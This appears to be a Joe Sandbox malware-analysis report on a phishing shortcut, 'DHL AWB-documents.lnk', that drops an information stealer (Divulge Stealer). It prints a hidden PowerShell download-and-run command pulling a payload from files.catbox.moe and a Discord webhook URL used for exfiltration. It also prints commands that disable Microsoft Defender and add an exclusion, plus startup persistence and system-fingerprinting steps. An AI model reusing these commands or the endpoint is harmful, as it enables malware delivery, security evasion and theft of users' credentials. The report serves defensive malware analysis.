Source: powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F3188CA000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F3188A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: setup_x86.exe.0.dr	String found in binary or memory: https://discord.com/api/v10/users/
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318621000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F3188CA000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F3188A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8Ts
Source: setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, 8mzJ3.scr.3.dr, setup_x86.exe.0.dr	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: powershell.exe, 00000000.00000002.2194606732.0000017D59E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.
Source: powershell.exe, 00000000.00000002.2196008997.0000017D5CC52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe
Source: powershell.exe, 00000000.00000002.2196008997.0000017D5D716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2196008997.0000017D5C252000.00000004.00000800.00020000.00000000.sdmp, DHL AWB-documents.lnk	String found in binary or memory: https://files.catbox.moe/l2rczc.pif
Source: powershell.exe, 00000000.00000002.2196008997.0000017D5D63B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2196008997.0000017D5D60C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe;
Source: powershell.exe, 00000015.00000002.2580598582.0000023C086A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: setup_x86.exe.0.dr	String found in binary or memory: https://github.com/PyDevOG/Divulge-Stealer
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F3188A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/PyDevOG/Divulge-StealerX
Source: powershell.exe, 00000000.00000002.2196008997.0000017D5CC52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C09915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, 8mzJ3.scr.3.dr, setup_x86.exe.0.dr	String found in binary or memory: https://gstatic.com/generate_204g==================Divulge
Source: powershell.exe, 00000000.00000002.2196008997.0000017D5DA02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2212946133.0000017D6C092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2212946133.0000017D6C1D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2307911377.000002286BC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2539623035.000001D46864E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2539623035.000001D468784000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2446999443.000001D459F8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C09D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2731271998.0000023C184E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000010.00000002.2446999443.000001D459A73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000010.00000002.2446999443.000001D459A73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846

Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49840 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\Downloads\setup_x86.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Downloads\setup_x86.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: DHL AWB-documents.lnk

LNK file: -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"

Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348D4CFB	3_2_00007FFD348D4CFB
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348CF468	3_2_00007FFD348CF468
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348D1C8D	3_2_00007FFD348D1C8D
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34913E20	3_2_00007FFD34913E20
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34913DA8	3_2_00007FFD34913DA8
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348D9EED	3_2_00007FFD348D9EED
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348CBE75	3_2_00007FFD348CBE75
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD3491BE88	3_2_00007FFD3491BE88
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348DA0F8	3_2_00007FFD348DA0F8
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348DB128	3_2_00007FFD348DB128
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348C108D	3_2_00007FFD348C108D
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348DA0D0	3_2_00007FFD348DA0D0
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348DEA08	3_2_00007FFD348DEA08
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348DBA9D	3_2_00007FFD348DBA9D
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348D337D	3_2_00007FFD348D337D
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348CD3D5	3_2_00007FFD348CD3D5
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348DBCE3	3_2_00007FFD348DBCE3
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348E1558	3_2_00007FFD348E1558
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348E44C0	3_2_00007FFD348E44C0
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348D7E4D	3_2_00007FFD348D7E4D
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348E1560	3_2_00007FFD348E1560
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348CCE7D	3_2_00007FFD348CCE7D
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348F100C	3_2_00007FFD348F100C
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348D99F3	3_2_00007FFD348D99F3
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348CFA48	3_2_00007FFD348CFA48
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348E1278	3_2_00007FFD348E1278
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348E1BF0	3_2_00007FFD348E1BF0
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A90621	3_2_00007FFD34A90621
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A91191	3_2_00007FFD34A91191
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A935A2	3_2_00007FFD34A935A2
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A8AB18	3_2_00007FFD34A8AB18
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A89F20	3_2_00007FFD34A89F20
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A8E01C	3_2_00007FFD34A8E01C
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A8A372	3_2_00007FFD34A8A372
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A8AB60	3_2_00007FFD34A8AB60
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A81065	3_2_00007FFD34A81065
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A81CD5	3_2_00007FFD34A81CD5
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A82658	3_2_00007FFD34A82658
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A825D0	3_2_00007FFD34A825D0
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A8AB20	3_2_00007FFD34A8AB20
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A81A92	3_2_00007FFD34A81A92
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A916C7	3_2_00007FFD34A916C7
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A8FBF2	3_2_00007FFD34A8FBF2
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A8B438	3_2_00007FFD34A8B438
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A8241D	3_2_00007FFD34A8241D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD3488B8FA	4_2_00007FFD3488B8FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD3488B9FA	4_2_00007FFD3488B9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD34888E25	4_2_00007FFD34888E25
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348A41F2	8_2_00007FFD348A41F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3497155E	8_2_00007FFD3497155E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFD348A25CD	16_2_00007FFD348A25CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFD348C8202	21_2_00007FFD348C8202
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFD348C7456	21_2_00007FFD348C7456

Source: Joe Sandbox View	Dropped File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr 1E8D2F6FA4B8D1EC630758422C493DE85D367F2EB7C76B452B9843ED2B2A7BFF
Source: Joe Sandbox View	Dropped File: C:\Users\user\Downloads\setup_x86.exe 1E8D2F6FA4B8D1EC630758422C493DE85D367F2EB7C76B452B9843ED2B2A7BFF

Source: setup_x86.exe.0.dr, ------.cs	Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: 8mzJ3.scr.3.dr, ------.cs	Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'

Source: setup_x86.exe.0.dr, ------.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: setup_x86.exe.0.dr, ------.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 8mzJ3.scr.3.dr, ------.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 8mzJ3.scr.3.dr, ------.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winLNK@29/26@3/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Downloads\setup_x86.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
Source: C:\Users\user\Downloads\setup_x86.exe	Mutant created: \Sessions\1\BaseNamedObjects\sW7ROjkdVeQ0ALYye0hE
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1208:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggzbnwr2.bgp.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Users\user\Downloads\setup_x86.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318CDD000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F318CC9000.00000004.00000800.00020000.00000000.sdmp, GWb46Z7cSlJX4lz.3.dr, oJS6JdBCH5vENDt.3.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL AWB-documents.lnk	Virustotal: Detection: 46%
Source: DHL AWB-documents.lnk	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Downloads\setup_x86.exe "C:\Users\user\Downloads\setup_x86.exe"
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct \| Select-Object -ExpandProperty displayName
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Downloads\setup_x86.exe "C:\Users\user\Downloads\setup_x86.exe"	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe'	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct \| Select-Object -ExpandProperty displayName	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
